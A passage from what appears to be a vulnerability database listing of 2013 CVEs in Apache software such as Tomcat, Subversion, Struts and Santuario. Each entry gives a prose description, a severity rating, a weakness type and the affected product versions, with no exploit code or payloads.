apache tomcat 7.0.20
apache tomcat 6.0.21
apache tomcat 7.0.28
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 7.0.21
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 6.0.36
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.8
apache tomcat 7.0.17
apache tomcat 7.0.2
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.24
apache tomcat 7.0.5
apache tomcat 7.0.22
apache tomcat 7.0.0
apache tomcat 7.0.30
apache tomcat 7.0.32
apache tomcat 6.0.35
CVE-2013-2071 LOW

java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 7.0.25
apache tomcat 7.0.13
apache tomcat 7.0.15
apache tomcat 7.0.23
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 7.0.12
apache tomcat 7.0.20
apache tomcat 7.0.28
apache tomcat 7.0.14
apache tomcat 7.0.21
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.3
apache tomcat 7.0.8
apache tomcat 7.0.17
apache tomcat 7.0.2
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.22
apache tomcat 7.0.0
apache tomcat 7.0.30
apache tomcat 7.0.32
CVE-2013-2088 HIGH

contrib/hook-scripts/svn-keyword-check.pl in Subversion before 1.6.23 allows remote authenticated users with commit permissions to execute arbitrary commands via shell metacharacters in a filename.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache subversion 1.6.18
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.6.6
apache subversion 1.6.11
opensuse opensuse 11.4
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.2
apache subversion 1.6.9
apache subversion 1.6.19
apache subversion 1.6.17
apache subversion *
apache subversion 1.6.7
apache subversion 1.6.10
apache subversion 1.6.20
apache subversion 1.6.12
apache subversion 1.6.1
apache subversion 1.6.13
collabnet subversion 1.6.17
apache subversion 1.6.3
apache subversion 1.6.5
apache subversion 1.6.15
apache subversion 1.6.14
CVE-2013-2112 HIGH

The svnserve server in Subversion before 1.6.23 and 1.7.x before 1.7.10 allows remote attackers to cause a denial of service (exit) by aborting a connection.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apache subversion 1.6.18
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.6.6
apache subversion 1.6.11
canonical ubuntu_linux 12.04
opensuse opensuse 11.4
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.2
apache subversion 1.6.9
apache subversion 1.7.6
apache subversion 1.6.19
canonical ubuntu_linux 12.10
apache subversion 1.7.9
canonical ubuntu_linux 13.04
apache subversion 1.7.4
apache subversion 1.6.17
apache subversion 1.7.1
apache subversion *
apache subversion 1.6.7
apache subversion 1.6.10
apache subversion 1.6.20
apache subversion 1.7.5
apache subversion 1.6.12
apache subversion 1.6.1
apache subversion 1.6.13
collabnet subversion 1.6.17
apache subversion 1.6.3
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.6.5
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
CVE-2013-2115 HIGH

Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache struts *
CVE-2013-2134 HIGH

Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache struts *
CVE-2013-2135 HIGH

Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache struts *
CVE-2013-2136 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache CloudStack before 4.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) Physical network name to the Zone wizard; (2) New network name, (3) instance name, or (4) group to the Instance wizard; (5) unspecified "multi-edit fields;" and (6) unspecified "list view" edit fields related to global settings.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache cloudstack 2.1.5
apache cloudstack 4.0.0
apache cloudstack 4.0.2
apache cloudstack 2.0.1
apache cloudstack 2.1.10
apache cloudstack 2.2.0
apache cloudstack 2.2.2
apache cloudstack 2.2.5
apache cloudstack 2.2.14
apache cloudstack *
apache cloudstack 2.1.7
apache cloudstack 2.2.1
apache cloudstack 2.2.7
apache cloudstack 2.1.9
apache cloudstack 2.2.6
apache cloudstack 2.2.9
apache cloudstack 2.1.6
apache cloudstack 2.1.0
apache cloudstack 3.0.2
apache cloudstack 3.0.1
apache cloudstack 2.1.8
apache cloudstack 2.1.4
apache cloudstack 3.0.0
apache cloudstack 2.1.3
apache cloudstack 2.2.12
apache cloudstack 2.2.8
apache cloudstack 2.1.2
apache cloudstack 2.1.1
apache cloudstack 2.2.3
apache cloudstack 2.0
apache cloudstack 4.0.1
apache cloudstack 2.2.11
apache cloudstack 2.2.13
CVE-2013-2137 MEDIUM

Cross-site scripting (XSS) vulnerability in the "View Log" screen in the Webtools application in Apache Open For Business Project (aka OFBiz) 10.04.01 through 10.04.05, 11.04.01 through 11.04.02, and 12.04.01 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ofbiz 10.04.01
apache ofbiz 10.04.03
apache ofbiz 11.04.01
apache ofbiz 10.04.05
apache ofbiz 10.04.04
apache ofbiz 11.04.02
apache ofbiz 12.04.01
apache ofbiz 10.04.02
CVE-2013-2153 MEDIUM

The XML digital signature functionality (xsec/dsig/DSIGReference.cpp) in Apache Santuario XML Security for C++ (aka xml-security-c) before 1.7.1 allows context-dependent attackers to reuse signatures and spoof arbitrary content via crafted Reference elements in the Signature, aka "XML Signature Bypass issue."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache xml_security_for_c++ 1.1.0
apache xml_security_for_c++ 1.6.0
apache xml_security_for_c++ 0.1.0
apache xml_security_for_c++ 1.3.1
apache xml_security_for_c++ 1.4.0
apache xml_security_for_c++ 1.5.1
apache xml_security_for_c++ *
apache xml_security_for_c++ 1.2.1
apache xml_security_for_c++ 1.2.0
apache xml_security_for_c++ 0.2.0
apache xml_security_for_c++ 1.5.0
apache xml_security_for_c++ 1.6.1
apache xml_security_for_c++ 1.3.0
CVE-2013-2154 HIGH

Stack-based buffer overflow in the XML Signature Reference functionality (xsec/dsig/DSIGReference.cpp) in Apache Santuario XML Security for C++ (aka xml-security-c) before 1.7.1 allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via malformed XPointer expressions, probably related to the DSIGReference::getURIBaseTXFM function.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache xml_security_for_c++ 1.1.0
apache xml_security_for_c++ 1.6.0
apache xml_security_for_c++ 0.1.0
apache xml_security_for_c++ 1.3.1
apache xml_security_for_c++ 1.4.0
apache xml_security_for_c++ 1.5.1
apache xml_security_for_c++ *
apache xml_security_for_c++ 1.2.1
apache xml_security_for_c++ 1.2.0
apache xml_security_for_c++ 0.2.0
apache xml_security_for_c++ 1.5.0
apache xml_security_for_c++ 1.6.1
apache xml_security_for_c++ 1.3.0
CVE-2013-2155 MEDIUM

Apache Santuario XML Security for C++ (aka xml-security-c) before 1.7.1 does not properly validate length values, which allows remote attackers to cause a denial of service or bypass the CVE-2009-0217 protection mechanism and spoof a signature via crafted length values to the (1) compareBase64StringToRaw, (2) DSIGAlgorithmHandlerDefault, or (3) DSIGAlgorithmHandlerDefault::verify functions.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache xml_security_for_c++ 1.1.0
apache xml_security_for_c++ 1.6.0
apache xml_security_for_c++ 0.1.0
apache xml_security_for_c++ 1.3.1
apache xml_security_for_c++ 1.4.0
apache xml_security_for_c++ 1.5.1
apache xml_security_for_c++ *
apache xml_security_for_c++ 1.2.1
apache xml_security_for_c++ 1.2.0
apache xml_security_for_c++ 0.2.0
apache xml_security_for_c++ 1.5.0
apache xml_security_for_c++ 1.6.1
apache xml_security_for_c++ 1.3.0
CVE-2013-2156 HIGH

Heap-based buffer overflow in the Exclusive Canonicalization functionality (xsec/canon/XSECC14n20010315.cpp) in Apache Santuario XML Security for C++ (aka xml-security-c) before 1.7.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted PrefixList attribute.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache xml_security_for_c++ 1.1.0
apache xml_security_for_c++ 1.6.0
apache xml_security_for_c++ 0.1.0
apache xml_security_for_c++ 1.3.1
apache xml_security_for_c++ 1.4.0
apache xml_security_for_c++ 1.5.1
apache xml_security_for_c++ *
apache xml_security_for_c++ 1.2.1
apache xml_security_for_c++ 1.2.0
apache xml_security_for_c++ 0.2.0
apache xml_security_for_c++ 1.5.0
apache xml_security_for_c++ 1.6.1
apache xml_security_for_c++ 1.3.0
CVE-2013-2160 MEDIUM

The streaming XML parser in Apache CXF 2.5.x before 2.5.10, 2.6.x before 2.6.7, and 2.7.x before 2.7.4 allows remote attackers to cause a denial of service (CPU and memory consumption) via crafted XML with a large number of (1) elements, (2) attributes, (3) nested constructs, and possibly other vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache cxf 2.7.0
apache cxf 2.5.8
apache cxf 2.6.3
apache cxf 2.6.6
apache cxf 2.6.0
apache cxf 2.6.4
apache cxf 2.5.0
apache cxf 2.5.5
apache cxf 2.5.6
apache cxf 2.6.5
apache cxf 2.5.3
apache cxf 2.6.1
apache cxf 2.7.1
apache cxf 2.5.9
apache cxf 2.5.1
apache cxf 2.5.4
apache cxf 2.6.2
apache cxf 2.5.2
apache cxf 2.5.7
apache cxf 2.7.3
apache cxf 2.7.2
CVE-2013-2172 MEDIUM

jcp/xml/dsig/internal/dom/DOMCanonicalizationMethod.java in Apache Santuario XML Security for Java 1.4.x before 1.4.8 and 1.5.x before 1.5.5 allows context-dependent attackers to spoof an XML Signature by using the CanonicalizationMethod parameter to specify an arbitrary weak "canonicalization algorithm to apply to the SignedInfo part of the Signature."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache santuario_xml_security_for_java 1.5.2
apache xml_security_for_java 1.5.1
apache xml_security_for_java 1.4.7
apache xml_security_for_java 1.5.0
apache xml_security_for_java 1.5.4
apache santuario_xml_security_for_java 1.5.3
apache xml_security_for_java 1.5.3
apache santuario_xml_security_for_java 1.5.1
apache xml_security_for_java 1.5.2
apache santuario_xml_security_for_java 1.4.7
apache santuario_xml_security_for_java 1.5.4
apache santuario_xml_security_for_java 1.5.0
CVE-2013-2185 HIGH

The readObject method in the DiskFileItem class in Apache Tomcat and JBoss Web, as used in Red Hat JBoss Enterprise Application Platform 6.1.0 and Red Hat JBoss Portal 6.0.0, allows remote attackers to write to arbitrary files via a NULL byte in a file name in a serialized instance, a similar issue to CVE-2013-2186. NOTE: this issue is reportedly disputed by the Apache Tomcat team, although Red Hat considers it a vulnerability. The dispute appears to regard whether it is the responsibility of applications to avoid providing untrusted data to be deserialized, or whether this class should inherently protect against this issue.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat *
redhat jboss_enterprise_application_platform 6.1.0
redhat jboss_enterprise_portal_platform 6.0.0
CVE-2013-2187 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache Archiva 1.2 through 1.2.2 and 1.3 before 1.3.8 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters, related to the home page.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache archiva 1.3.1
apache archiva 1.3.5
apache archiva 1.3
apache archiva 1.2
apache archiva 1.2.1
apache archiva 1.3.4
apache archiva 1.2.2
apache archiva 1.3.3
apache archiva 1.3.6
apache archiva 1.3.2
CVE-2013-2189 MEDIUM

Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2013-2192 LOW

The RPC protocol implementation in Apache Hadoop 2.x before 2.0.6-alpha, 0.23.x before 0.23.9, and 1.x before 1.2.1, when the Kerberos security features are enabled, allows man-in-the-middle attackers to disable bidirectional authentication and obtain sensitive information by forcing a downgrade to simple authentication.

CVSS 2.0

Severity: LOW

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache hadoop 0.23.5
apache hadoop 2.0.5
apache hadoop 0.23.4
apache hadoop 0.23.3
apache hadoop 1.0.1
apache hadoop 1.0.2
apache hadoop 2.0.2
apache hadoop 0.23.8
apache hadoop 1.1.2
apache hadoop 2.0.4
apache hadoop 1.0.4
apache hadoop 1.0.3
apache hadoop 0.23.7
apache hadoop 2.0.0
apache hadoop 1.1.1
apache hadoop 0.23.0
apache hadoop 2.0.3
apache hadoop 1.1.0
apache hadoop 1.2.0
apache hadoop 0.23.1
apache hadoop 2.0.1
apache hadoop 0.23.6
apache hadoop 1.0.0
CVE-2013-2193 MEDIUM

Apache HBase 0.92.x before 0.92.3 and 0.94.x before 0.94.9, when the Kerberos features are enabled, allows man-in-the-middle attackers to disable bidirectional authentication and obtain sensitive information via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache hbase 0.94.3
apache hbase 0.94.4
apache hbase 0.92.0
apache hbase 0.94.6.1
apache hbase 0.94.0
apache hbase 0.94.6
apache hbase 0.94.7
apache hbase 0.94.5
apache hbase 0.92.1
apache hbase 0.94.8
apache hbase 0.94.1
apache hbase 0.92.2
apache hbase 0.94.2
CVE-2013-2210 HIGH

Heap-based buffer overflow in the XML Signature Reference functionality in Apache Santuario XML Security for C++ (aka xml-security-c) before 1.7.2 allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via malformed XPointer expressions. NOTE: this is due to an incorrect fix for CVE-2013-2154.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache xml_security_for_c++ 1.1.0
apache xml_security_for_c++ 1.6.0
apache xml_security_for_c++ 0.1.0
apache xml_security_for_c++ 1.3.1
apache xml_security_for_c++ 1.7.0
apache xml_security_for_c++ 1.4.0
apache xml_security_for_c++ 1.5.1
apache xml_security_for_c++ *
apache xml_security_for_c++ 1.2.1
apache xml_security_for_c++ 1.2.0
apache xml_security_for_c++ 0.2.0
apache xml_security_for_c++ 1.5.0
apache xml_security_for_c++ 1.6.1
apache xml_security_for_c++ 1.3.0
CVE-2013-2248 MEDIUM

Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.3.4.1
apache struts 2.0.9
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.3.14.1
apache struts 2.0.11
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.0.8
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.3.4
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.0.3
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.0.12
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.0.14
apache struts 2.3.1.2
apache struts 2.0.0
apache struts 2.2.3
CVE-2013-2249 HIGH

mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
CVE-2013-2250 HIGH

Apache Open For Business Project (aka OFBiz) 10.04.01 through 10.04.05, 11.04.01 through 11.04.02, and 12.04.01 allows remote attackers to execute arbitrary Unified Expression Language (UEL) functions via JUEL metacharacters in unspecified parameters, related to nested expressions.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache ofbiz 10.04.01
apache ofbiz 10.04.03
apache ofbiz 11.04.01
apache ofbiz 10.04.05
apache ofbiz 10.04.04
apache ofbiz 11.04.02
apache ofbiz 12.04.01
apache ofbiz 10.04.02
CVE-2013-2251 HIGH

Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache struts *
fujitsu interstage_business_process_manager_analytics 12.1
fujitsu gp-s_firmware -
oracle siebel_apps_-_e-billing 6.2
apache archiva 1.2
fujitsu sparc_firmware -
apache archiva 1.2.2
oracle siebel_apps_-_e-billing 6.1.1
fujitsu primepower_firmware -
fujitsu primergy_firmware -
oracle siebel_apps_-_e-billing 6.1
fujitsu interstage_business_process_manager_analytics 12.0
fujitsu gp5000_firmware -
apache archiva *
fujitsu gp7000f_firmware -
CVE-2013-2254 MEDIUM

The deepGetOrCreateNode function in impl/operations/AbstractCreateOperation.java in org.apache.sling.servlets.post.bundle 2.2.0 and 2.3.0 in Apache Sling does not properly handle a NULL value that is returned when the session does not have permissions to the root node, which allows remote attackers to cause a denial of service (infinite loop) via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache org.apache.sling.servlets.post 2.3.0
apache org.apache.sling.servlets.post 2.2.0
CVE-2013-2756 MEDIUM

Apache CloudStack 4.0.0 before 4.0.2 and Citrix CloudPlatform (formerly Citrix CloudStack) 3.0.x before 3.0.6 Patch C allows remote attackers to bypass the console proxy authentication by leveraging knowledge of the source code.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
citrix cloudplatform 3.0.4
citrix cloudplatform 3.0
apache cloudstack 4.0.0
citrix cloudplatform 3.0.3
citrix cloudplatform 3.0.5
apache cloudstack 4.0.2
apache cloudstack 4.0.1
citrix cloudplatform 3.0.6
CVE-2013-2758 MEDIUM

Apache CloudStack 4.0.0 before 4.0.2 and Citrix CloudPlatform (formerly Citrix CloudStack) 3.0.x before 3.0.6 Patch C uses a hash of a predictable sequence, which makes it easier for remote attackers to guess the console access URL via a brute force attack.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
citrix cloudplatform 3.0.4
citrix cloudplatform 3.0
apache cloudstack 4.0.0
citrix cloudplatform 3.0.3
citrix cloudplatform 3.0.5
apache cloudstack 4.0.2
apache cloudstack 4.0.1
citrix cloudplatform 3.0.6
CVE-2013-3060 MEDIUM

The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache activemq 4.1.0
apache activemq 5.6.0
apache activemq *
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 4.0
apache activemq 4.0.2
apache activemq 5.3.0
apache activemq 4.0.1
apache activemq 5.0.0
apache activemq 5.5.1
apache activemq 5.2.0
apache activemq 5.4.1
apache activemq 4.1.1
CVE-2013-4002 HIGH

XMLscanner.java in Apache Xerces2 Java Parser before 2.12.0, as used in the Java Runtime Environment (JRE) in IBM Java 5.0 before 5.0 SR16-FP3, 6 before 6 SR14, 6.0.1 before 6.0.1 SR6, and 7 before 7 SR5 as well as Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, Java SE Embedded 7u40 and earlier, and possibly other products allows remote attackers to cause a denial of service via vectors related to XML attribute names.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
ibm java 6.0.13.2
ibm tivoli_application_dependency_discovery_manager 7.2.2
ibm java 7.0.1.0
ibm host_on-demand 11.0.6
ibm java 7.0.2.0
ibm java 5.0.11.1
ibm host_on-demand 11.0
suse linux_enterprise_server 9
ibm java 6.0.12.0
ibm host_on-demand 11.0.1
suse linux_enterprise_desktop 11
suse linux_enterprise_server 10
ibm sterling_b2b_integrator 5.1
ibm java 5.0.12.3
oracle jre 1.5.0
ibm java 5.0.15.0
ibm host_on-demand 11.0.3
ibm java 7.0.3.0
canonical ubuntu_linux 13.04
canonical ubuntu_linux 13.10
ibm java 5.0.12.2
ibm host_on-demand 11.0.2
oracle jre 1.7.0
ibm java 5.0.14.0
ibm java 7.0.4.2
ibm java 5.0.11.0
ibm java 6.0.8.0
ibm java 6.0.4.0
ibm java 5.0.0.0
suse linux_enterprise_java 11
ibm java 6.0.10.1
opensuse opensuse 12.3
ibm java 5.0.12.5
ibm java 6.0.11.0
suse linux_enterprise_java 10
ibm java 5.0.12.4
ibm host_on-demand 11.0.7
ibm java 6.0.3.0
ibm host_on-demand 11.0.5.1
ibm java 5.0.11.2
ibm java 5.0.16.2
ibm java 6.0.9.0
ibm sterling_file_gateway 2.1
ibm java 6.0.0.0
ibm host_on-demand 11.0.6.1
ibm host_on-demand 11.0.5
ibm java 5.0.12.1
canonical ubuntu_linux 12.04
oracle jre 1.6.0
ibm java 5.0.16.1
ibm java 5.0.12.0
suse linux_enterprise_desktop 10
ibm host_on-demand 11.0.8
canonical ubuntu_linux 12.10
ibm java 6.0.5.0
ibm sterling_file_gateway 2.2
ibm sterling_b2b_integrator 5.2
suse linux_enterprise_server 11
suse linux_enterprise_sdk 11
canonical ubuntu_linux 10.04
ibm java 6.0.9.1
ibm java 6.0.2.0
oracle jdk 1.5.0
ibm java 7.0.0.0
ibm java 6.0.7.0
ibm java 6.0.6.0
ibm java 5.0.13.0
ibm java 6.0.8.1
ibm java 7.0.4.0
oracle jdk 1.7.0
ibm java 7.0.4.1
ibm sterling_b2b_integrator 5.2.4
apache xerces2_java *
ibm java 6.0.1.0
ibm host_on-demand 11.0.4
ibm java 6.0.9.2
ibm java 5.0.16.0
oracle jdk 1.6.0
opensuse opensuse 12.2
oracle jrockit *
ibm java 6.0.10.0
ibm java 6.0.13.1
ibm java 6.0.13.0
CVE-2013-4131 MEDIUM

The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apache subversion 1.7.1
apache subversion 1.8.0
apache subversion 1.7.8
apache subversion 1.7.10
apache subversion 1.7.5
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.7.6
apache subversion 1.7.9
apache subversion 1.7.4
apache subversion 1.7.7
CVE-2013-4156 MEDIUM

Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2013-4171 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.2 allow remote attackers to inject arbitrary web script or HTML via vectors related to the search results in the (1) RSS and (2) Atom feed templates.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache roller 4.0.1
apache roller *
apache roller 5.0
apache roller 4.0
CVE-2013-4212 MEDIUM

Certain getText methods in the ActionSupport controller in Apache Roller before 5.0.2 allow remote attackers to execute arbitrary OGNL expressions via the first or second parameter, as demonstrated by the pageTitle parameter in the !getPageTitle sub-URL to roller-ui/login.rol, which uses a subclass of UIAction, aka "OGNL Injection."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache roller 4.0.1
apache roller *
apache roller 5.0
apache roller 4.0
CVE-2013-4246 MEDIUM

libsvn_fs_fs/fs_fs.c in Apache Subversion 1.8.x before 1.8.2 might allow remote authenticated users with commit access to corrupt FSFS repositories and cause a denial of service or obtain sensitive information by editing packed revision properties.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache subversion 1.8.0
apache subversion 1.8.1
CVE-2013-4262 LOW

svnwcsub.py in Subversion 1.8.0 before 1.8.3, when using the --pidfile option and running in foreground mode, allows local users to gain privileges via a symlink attack on the pid file. NOTE: this issue was SPLIT due to different affected versions (ADT3). The irkerbridge.py issue is covered by CVE-2013-7393.

CVSS 2.0

Severity: LOW

Problem Type: CWE-59,

Products Affected

Vendor Product Version
apache subversion 1.8.2
apache subversion 1.8.0
apache subversion 1.8.1
CVE-2013-4277 LOW

Svnserve in Apache Subversion 1.4.0 through 1.7.12 and 1.8.0 through 1.8.1 allows local users to overwrite arbitrary files or kill arbitrary processes via a symlink attack on the file specified by the --pid-file option.

CVSS 2.0

Severity: LOW

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache subversion 1.4.0
apache subversion 1.6.18
apache subversion 1.8.0
apache subversion 1.6.6
apache subversion 1.5.3
apache subversion 1.6.11
apache subversion 1.7.11
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
apache subversion 1.7.4
apache subversion 1.5.6
apache subversion 1.6.17
apache subversion 1.4.3
apache subversion 1.6.20
apache subversion 1.7.5
apache subversion 1.6.12
apache subversion 1.6.13
apache subversion 1.7.12
apache subversion 1.6.3
apache subversion 1.6.5
apache subversion 1.5.8
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
apache subversion 1.7.3
apache subversion 1.5.5
apache subversion 1.6.21
apache subversion 1.5.7
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.5.2
apache subversion 1.8.1
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.9
apache subversion 1.7.6
apache subversion 1.6.19
apache subversion 1.7.9
apache subversion 1.5.4
apache subversion 1.6.23
apache subversion 1.4.2
apache subversion 1.4.6
apache subversion 1.7.1
apache subversion 1.4.5
apache subversion 1.6.7
apache subversion 1.4.4
apache subversion 1.7.10
apache subversion 1.6.10
apache subversion 1.6.1
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.4.1
CVE-2013-4286 MEDIUM

Apache Tomcat before 6.0.39, 7.x before 7.0.47, and 8.x before 8.0.0-RC3, when an HTTP connector or AJP connector is used, does not properly handle certain inconsistent HTTP request headers, which allows remote attackers to trigger incorrect identification of a request's length and conduct request-smuggling attacks via (1) multiple Content-Length headers or (2) a Content-Length header and a "Transfer-Encoding: chunked" header. NOTE: this vulnerability exists because of an incomplete fix for CVE-2005-2090.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 4.1.29
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.0.22
apache tomcat 5.0.5
apache tomcat 1.1.3
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 7.0.44
apache tomcat 6.0.29
apache tomcat 4.0.3
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 7.0.33
apache tomcat 3.0
apache tomcat 6.0.36
apache tomcat 5.0.23
apache tomcat 7.0.3
